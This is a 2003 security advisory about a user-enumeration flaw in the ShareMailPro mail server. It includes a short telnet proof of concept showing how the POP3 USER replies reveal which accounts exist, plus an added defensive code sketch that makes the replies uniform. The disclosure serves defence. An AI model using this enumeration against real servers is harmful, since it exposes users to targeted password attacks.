SecurityTracker.com






Category:   Application (E-mail Server)  >   ShareMailPro
Vendors:   LavaSoftware Technologies
ShareMailPro Discloses Valid Account Names to Remote Users
SecurityTracker Alert ID:  1006806
SecurityTracker URL:  http://securitytracker.com/id/1006806
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 21 2003
Impact:   Disclosure of user information
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 3.6.1
Description:   Ziv Kamir reported another vulnerability in ShareMailPro. A remote user can determine if a specified user account name exists on the system.

It is reported that a remote user can query the POP3 interface to determine if a particular user account exists or not. If the specified user does not exist, the server will respond with:

-ERR sorry , no such mailbox

If the specified user exists, the server will respond with:

+OK check your mailbox

Impact:   A remote user can determine valid user accounts on the system.
Solution:   No solution was available at the time of this entry. The vendor has reportedly responded to indicate that they plan to fix this vulnerability.
Vendor URL:  www.lavasoftware.net/en/content/shmailpro/overview.htm
Cause:   Access control error, State error
Underlying OS:   Windows (Any)

Message History:   None.
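
The two replies quoted in the Description differ at the USER step, before any password is sent. The sketch below is an added example, not ShareMailPro code or a vendor fix: a hypothetical Pop3Auth handler with constructed accounts that reproduces the reported replies when uniform=False and, by default, answers every USER the same way and rejects only at PASS.

```python
import hmac

# Constructed sample accounts (plaintext only to keep the sketch short;
# a real server would store password hashes).
ACCOUNTS = {"alice": "correct horse", "bob": "s3cret"}
_DUMMY = "\x00no-such-account\x00"  # compared against when the user is unknown


class Pop3Auth:
    """Hypothetical handler for USER/PASS in the POP3 AUTHORIZATION state."""

    def __init__(self, accounts, uniform=True):
        self.accounts = accounts
        self.uniform = uniform  # False reproduces the replies in the advisory
        self.pending_user = None
        self.authenticated = False

    def handle(self, line):
        verb, _, arg = line.strip().partition(" ")
        if verb.upper() == "USER":
            return self._user(arg)
        if verb.upper() == "PASS":
            return self._pass(arg)
        return "-ERR unknown command"

    def _user(self, name):
        if not self.uniform and name not in self.accounts:
            self.pending_user = None
            return "-ERR sorry , no such mailbox"  # reveals the name is unused
        # Uniform mode: remember the name and give every name the same reply.
        self.pending_user = name
        return "+OK check your mailbox"

    def _pass(self, password):
        if self.pending_user is None:
            return "-ERR send USER first"
        expected = self.accounts.get(self.pending_user)
        # Compare even for unknown users so both cases follow the same path.
        matches = hmac.compare_digest(
            (expected if expected is not None else _DUMMY).encode(),
            password.encode())
        self.pending_user = None
        if expected is not None and matches:
            self.authenticated = True
            return "+OK mailbox ready"
        return "-ERR authentication failed"  # same text for bad user or password
```

With the uniform handler, repeated failures still need rate limiting or lockout at the PASS step, since the password check is now the only gate.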


 Source Message Contents

Date:  Tue, 20 May 2003 13:04:23 -0700 (PDT)
Subject:  Vulnerability in the ShareMailPro Ver 3.6.1 Under The Pop3 Service





Hi,


Attached is a text file with the explanation.




19/05/03

Ziv Kamir
---------				

-------------------------------------------------------

Application: ShareMailPro
Web Site:    http://www.lavasoftware.net
Versions:    3.6.1
Platform:    Windows
Bug:         Obtain a list of valid users under the POP3 service.

Credits:
########

#################################
#                               #
# Ziv Kamir                     #
#                               #
# Email : vulncode@yahoo.com    #
#                               #
#                               #
#################################

---------------------

1) Introduction
2) Bug
3) The Code
4) Fix


===============
1) Introduction
===============

ShareMailPro is an e-mail server. With one domain name and a public mailbox, ShareMailPro provides your company
email service as an email server, as well as a local email server. It just fits for SOHO, offering efficiency and cost-effectiveness
without compromising security and flexibility.




=======
2) Bug
=======

Any remote attacker can obtain a list of valid users from the server.
The server acts differently for a valid user and for an invalid one.


The service that suffers from the vulnerability is POP3.

===========
3) The Code
===========

Not Valid User ( The Username Is Not_Valid_User )
--------------------------------------------------

C:> Telnet The_Smtp_Server_IP_Address 110

+OK ShareMailPro POP3 Server Ready

user Not_Valid_User

-ERR sorry , no such mailbox ( This is the response )


Valid User ( The Username Is Hack )
-----------------------------------

C:> Telnet The_Smtp_Server_IP_Address 110

+OK ShareMailPro POP3 Server Ready

user Hack

+OK check your mailbox ( This is the response )



======
4) Fix
======

Date of Vendor Notification:
19-05-03

Status:  

They will fix this security hole.


===========================================================

 *** The Data is for educational purpose only. *** 

===========================================================

Ziv Kamir

vulncode@yahoo.com 











 
 



Copyright 2012, SecurityGlobal.net LLC